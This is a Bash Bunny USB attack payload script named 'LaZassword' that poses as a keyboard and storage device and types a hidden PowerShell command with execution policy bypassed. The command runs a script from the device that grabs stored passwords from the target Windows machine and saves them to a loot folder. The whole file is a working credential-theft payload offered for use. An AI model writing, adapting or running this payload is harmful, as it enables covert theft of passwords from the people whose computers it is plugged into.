#!/bin/bash
#
# Title: LaZassword
# Author: kuyaya
# Version: 1.1

# Check readiness & prepare environment
LED SETUP
ATTACKMODE HID STORAGE

# Ensure loot is available for saving results.
mount -o sync /dev/nandf /root/udisk/

# Setup
DUCKY_LANG=ch
GET SWITCH_POSITION
GET TARGET_HOSTNAME 

# Attack
LED ATTACK

# Run lazassword.ps1 as admin
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\bypass.ps1')"

# Wait until passwords are grabbed
while [ ! -f /root/udisk/loot/LaZassword/done ]
do
LED ATTACK
done

# Finish
# The remove of the file is necessary. Else, the loop wouldn't work.
rm /root/udisk/loot/LaZassword/done
LED FINISH
